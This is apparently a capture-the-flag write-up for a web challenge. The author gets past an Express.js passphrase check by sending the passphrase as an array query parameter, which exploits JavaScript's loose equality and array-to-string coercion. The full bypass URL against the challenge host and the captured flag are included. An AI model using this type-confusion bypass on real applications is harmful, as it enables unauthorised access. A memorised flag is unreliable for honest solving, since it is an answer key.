Coney Island Hackers
Challenge
Coney Island Hackers have a secret web portal.
Using advanced social engineering techniques, you found out their secret passphrase: eat,sleep,hack,repeat. However, it seems to take more than just entering the passphrase as-is. Can you find out what?
http://46.101.107.117:2202
Solution
1
if (req.query.passphrase == 'eat,sleep,hack,repeat')
This hint was super unhelpful at first, eventually I fetched the HEAD of the website
1
2
3
4
5
6
7
8
9
$ curl -I http://46.101.107.117:2202/?passphrase=eat,sleep,hack,repeat
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 609
ETag: W/"261-eAa/QxeLx6CjmYOc9KnGojwfNKY"
Date: Thu, 05 May 2022 16:20:04 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Ahh express JS. After some super sleuthing (i.e. googling express nodejs form password check ctf hack
), I found this article which had a URL with split up password fields. This answered it for me, we need to pass in the passphrase as multiple elements like a list. In the old php days I remember seeing that quite often with ?param[]=value¶m[]=value2
Which, given the javascript behaviour of stringifying lists for comparison, by helpfully adding ,
s:
1
2
[1,2,3,4].toString()
"1,2,3,4"
means that’s how we solve it without commas:
1
http://46.101.107.117:2202/?passphrase[]=eat&passphrase[]=sleep&passphrase[]=hack&passphrase[]=repeat
Flag
he2022{el_dorado_arkade}